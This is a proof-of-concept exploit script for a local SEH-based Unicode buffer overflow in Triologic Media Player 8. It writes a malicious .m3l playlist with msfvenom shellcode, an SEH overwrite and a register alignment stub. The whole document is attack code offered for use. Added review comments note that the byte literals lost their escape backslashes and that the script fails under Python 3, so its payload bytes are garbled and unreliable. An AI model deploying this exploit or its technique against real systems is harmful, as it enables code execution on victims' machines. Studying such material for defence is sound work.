# Exploit Title: Triologic Media Player 8 - '.m3l' Local Buffer Overflow (Unicode) (SEH)
# Date: 04/04/2020
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
# Version: 8
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the python script, it will create a new file called "poc.m3l".
# 2.- Open the Application.
# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
# 4.- Click the bottom-right button that shows an arrow and is labelled "LIST".
# 5.- Select the file "poc.m3l".
# 6.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread
# Payload size: 512 bytes

# Encoded payload. The msfvenom line recorded above names the x86/unicode_mixed
# encoder with EAX as the buffer register, which is why the alignment stub further
# down finishes by leaving an address in EAX before its final `retn`.
# NOTE(review): as reproduced here these literals contain no backslash escape
# sequences -- "x50x50..." is plain ASCII text, not the bytes 0x50 0x50 ... -- so
# the "512 bytes" figure above does not describe what this script would actually
# emit. This looks like an extraction artifact of the page rather than the
# author's intent; the same caveat applies to every string literal below.
buf = b""
buf += b"x50x50x59x41x49x41x49x41x49x41x49x41x49"
buf += b"x41x49x41x49x41x49x41x49x41x49x41x49x41"
buf += b"x49x41x49x41x49x41x6ax58x41x51x41x44x41"
buf += b"x5ax41x42x41x52x41x4cx41x59x41x49x41x51"
buf += b"x41x49x41x51x41x49x41x68x41x41x41x5ax31"
buf += b"x41x49x41x49x41x4ax31x31x41x49x41x49x41"
buf += b"x42x41x42x41x42x51x49x31x41x49x51x49x41"
buf += b"x49x51x49x31x31x31x41x49x41x4ax51x59x41"
buf += b"x5ax42x41x42x41x42x41x42x41x42x6bx4dx41"
buf += b"x47x42x39x75x34x4ax42x79x6cx7ax48x61x72"
buf += b"x39x70x6bx50x49x70x73x30x54x49x47x75x70"
buf += b"x31x79x30x4fx74x72x6bx70x50x70x30x32x6b"
buf += b"x51x42x7ax6cx74x4bx42x32x6ex34x64x4bx64"
buf += b"x32x6bx78x6cx4fx57x47x4dx7ax4dx56x4ex51"
buf += b"x59x6fx46x4cx4fx4cx71x51x61x6cx49x72x4c"
buf += b"x6cx6dx50x36x61x46x6fx6cx4dx4ax61x37x57"
buf += b"x69x52x7ax52x31x42x51x47x74x4bx6ex72x4a"
buf += b"x70x44x4bx30x4ax4dx6cx34x4bx6ex6cx5ax71"
buf += b"x74x38x39x53x6dx78x49x71x5ax31x70x51x62"
buf += b"x6bx70x59x6bx70x5ax61x46x73x62x6bx4ex69"
buf += b"x4ax78x48x63x4fx4ax61x39x72x6bx4dx64x62"
buf += b"x6bx4ax61x36x76x4cx71x59x6fx44x6cx45x71"
buf += b"x58x4fx6ax6dx49x71x39x37x4dx68x39x50x73"
buf += b"x45x58x76x69x73x43x4dx4cx38x4fx4bx31x6d"
buf += b"x4cx64x72x55x58x64x72x38x62x6bx30x58x4f"
buf += b"x34x6ax61x7ax33x31x56x54x4bx4cx4cx6ex6b"
buf += b"x44x4bx50x58x4dx4cx4ax61x38x53x72x6bx5a"
buf += b"x64x54x4bx5ax61x58x50x33x59x61x34x6dx54"
buf += b"x6cx64x71x4bx51x4bx6fx71x62x39x70x5ax6f"
buf += b"x61x79x6fx47x70x61x4fx61x4fx71x4ax44x4b"
buf += b"x4dx42x38x6bx34x4dx4fx6dx42x4ax49x71x62"
buf += b"x6dx42x65x45x62x69x70x39x70x59x70x50x50"
buf += b"x51x58x4dx61x74x4bx42x4fx33x57x6bx4fx46"
buf += b"x75x37x4bx47x70x6bx6dx6ex4ax5ax6ax53x38"
buf += b"x46x46x52x75x65x6dx45x4dx6bx4fx57x65x6d"
buf += b"x6cx7ax66x43x4cx6cx4ax35x30x59x6bx67x70"
buf += b"x50x75x6bx55x45x6bx4dx77x5ax73x32x52x52"
buf += b"x4fx30x6ax59x70x51x43x69x6fx38x55x52x43"
buf += b"x50x61x32x4cx61x53x6cx6ex43x35x51x68x6f"
buf += b"x75x4dx30x41x41"

# SEH record overwrite: `nseh` occupies the next-handler slot and `seh` the
# handler-address slot. Each is written as two characters, consistent with the
# Unicode expansion the title refers to (every byte is followed by a 0x00 when
# the application widens the string) -- presumably, confirm against the binary.
nseh = "x71x41"
seh = "x41x4a"

# Alignment stub (the author's per-instruction annotations are kept below).
# Read together they describe: copy EBX into EAX via push/pop, adjust EAX with an
# add and a sub whose high bytes cancel, push the result and `retn` into it.
# The single `x71` entries the author marks as padding sit between instructions
# whose encodings would otherwise be broken by the interleaved 0x00 bytes.
alignment = ""
alignment += "x54x71" # push ebx, padding
alignment += "x58x71" # pop eax, padding
alignment += "x05x20x22" # add eax, 0x22002000
alignment += "x71" # Padding
alignment += "x2Dx19x22" # sub eax, 0x22001900
alignment += "x71" # Padding
alignment += "x50x71" # push eax, padding
alignment += "xC3" # retn

# File layout: 536 bytes of filler up to the SEH record, the two SEH slots, a
# 4-byte gap, the alignment stub, 71 more bytes of filler, the encoded payload,
# and a 2000-byte tail.
# NOTE(review): `buf` is a bytes object (built from b"" above) while every other
# operand here is str. Under Python 3 this concatenation raises TypeError; the
# script as written only runs under Python 2, where both are the same type.
# Defensive context: the observable artifact is an .m3l playlist whose entry is
# several kilobytes long; the process-level controls relevant to a SEH-based
# overwrite of this kind are SafeSEH/SEHOP, DEP and ASLR on the target binary.
buffer = "A" * 536 + nseh + seh + "x41x71x41x71" + alignment + "C" * 71 + buf + "C" * 2000
# Written in text mode with no explicit encoding, and closed by hand rather than
# with a `with` block; the file is created in the current working directory.
f = open ("poc.m3l", "w")
f.write(buffer)
f.close()